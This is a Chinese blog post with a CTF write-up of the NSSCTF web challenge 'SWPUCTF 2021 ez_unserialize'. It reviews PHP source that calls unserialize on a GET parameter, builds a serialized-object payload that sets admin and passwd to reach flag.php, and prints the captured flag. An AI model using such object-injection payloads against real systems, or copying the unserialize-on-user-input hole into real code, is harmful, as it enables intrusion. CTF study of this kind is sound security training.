首页 > 其他分享 >[SWPUCTF 2021 新生赛]ez_unserialize

[SWPUCTF 2021 新生赛]ez_unserialize

时间:2023-08-01 22:25:21浏览次数:46  
标签:admin unserialize echo passwd flag 2021 ez

[SWPUCTF 2021 新生赛]ez_unserialize

题目来源:nssctf

题目类型:web

涉及考点:PHP反序列化

1. 检查一下源代码,发现Disallow:

猜测大概有robots.txt,扫下后台看看:

额,flag.php都扫出来了,但是进不去,还是老老实实看robots吧:

2. 看到题目了,开始代码审计

<?php
error_reporting(0);
show_source("cl45s.php");
class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}
$p = $_GET['p'];
unserialize($p);
?>

没什么绕的,直接赋值$admin=admin,$passwd=ctf即可,然后将序列化字符串GET传给p:

构造payload:

/cl45s.php?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

得到flag:

NSSCTF{bd4955fc-3fd9-469d-921e-b4df269c884b}

日期:2023.8.1

作者:y0Zero

标签:admin,unserialize,echo,passwd,flag,2021,ez
From: https://www.cnblogs.com/bkofyZ/p/17599258.html

相关文章

  • LOJ3677 「北大集训 2021」出题高手
    卡死人了。数据随机写在上面,就是让你预估一下区间长度不会太长的,数据里最长的不超过\(2000\)。暴力扫\(2000\)个显然过不了\(500000\)的点,但是\(500000\)的点\(m\)为\(1\)且必定询问整个序列。可以分析出,在随机情况下,前缀和最小最大数量是根号个的,平方后是四次根号级......
  • [UUCTF 2022 新生赛]ez_rce
    [UUCTF2022新生赛]ez_rce题目来源:nssctf题目类型:web涉及考点:无参数rce1.先做代码审计:<?php##放弃把,小伙子,你真的不会RCE,何必在此纠结呢????????????if(isset($_GET['code'])){$code=$_GET['code'];if(!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|mo......
  • [SWPUCTF 2021 新生赛]no_wakeup
    [SWPUCTF2021新生赛]no_wakeup题目来源:nssctf题目类型:web涉及考点:PHP反序列化1.题目给了一个点击按钮,点进去看看:进去后就是代码审计了:<?phpheader("Content-type:text/html;charset=utf-8");error_reporting(0);show_source("class.php");classHaHaHa{p......
  • audition 2021 for Mac(au2021) v14.2直装版
    Audition2021Mac是一款专业数字音频编辑软件,提供先进的音频混音、编辑和效果处理功能,专为音频和视频专业人员设计。无论是要录制音乐、无线电广播,还是为录像配音,Audition都能帮到您。它可提供先进的音频混合、编辑、控制和效果处理功能。最多混合128个声道,可编辑单个音频文件,使......
  • 【d2l】【常见函数】【19】 torch.squeeze( ), torch.unsqueeze( )
    torch.squeeze()压缩大小为1的维度参考:https://pytorch.org/docs/stable/generated/torch.squeeze.htmltorch.unsqueeze()在指定的维度处增加一个维度,大小为1参考:https://pytorch.org/docs/stable/generated/torch.unsqueeze.html......
  • 2021年湖南省对口高考真题
    一、选择题1、若"inta=-7,b=-1;",执行"a%=b-1;"后,a的值是__________。         A.-7              B.-1              C.-2              D.-32、C语言程序从程序中的__________开始执行。A.第一条语句         ......
  • remote: Support for password authentication was removed on August 13, 2021
    一、问题描述remote:SupportforpasswordauthenticationwasremovedonAugust13,2021.Pleaseuseapersonalaccesstokeninstead.具体如下:  大概意思:你原先的密码凭证从2021年8月13日开始就不能用了,必须使用个人访问令牌(personalaccesstoken),就是把你的密码替......
  • [SWPUCTF 2021 新生赛]pop
    [SWPUCTF2021新生赛]pop题目来源:nssctf题目类型:web涉及考点:PHP反序列化、pop链1.上来先做代码审计<?phperror_reporting(0);show_source("index.php");classw44m{private$admin='aaa';protected$passwd='123456';publicfunction......
  • FVP原班人马的新盘子UEZ优易汇又跑路了,这次“黑客”又成“背锅大侠”
    去年7月,FVP跑路,当时FVP将锅甩给所谓的全球反洗钱组织这个根本不存在的组织。FX110在去年就已经曝光过:《保本yue收益15%?FVPTrade是虚假宣传多个监管的资金盘!》、《汇圈“大地震”!FVPTrade、TriumphFX、LILIUM三家资金盘齐暴雷》。而在FVP跑路以后,其操盘手又马不停蹄地搞起了UEZ优......
  • 图论2021版
    图基本概念图可以理解成一个二元组,是由点集V和边集E组成的。G=(V,E),V表示点的集合,E表示边的集合。每条边是一幅点对(v,w)v,w都是点集V中的点。(v,w∈V)图的分类:可以按照边有无方向,可以分为有向图和无向图。比如上图1中,边AB之间没有画出方向(即点之间是无序的),这就是无向图。......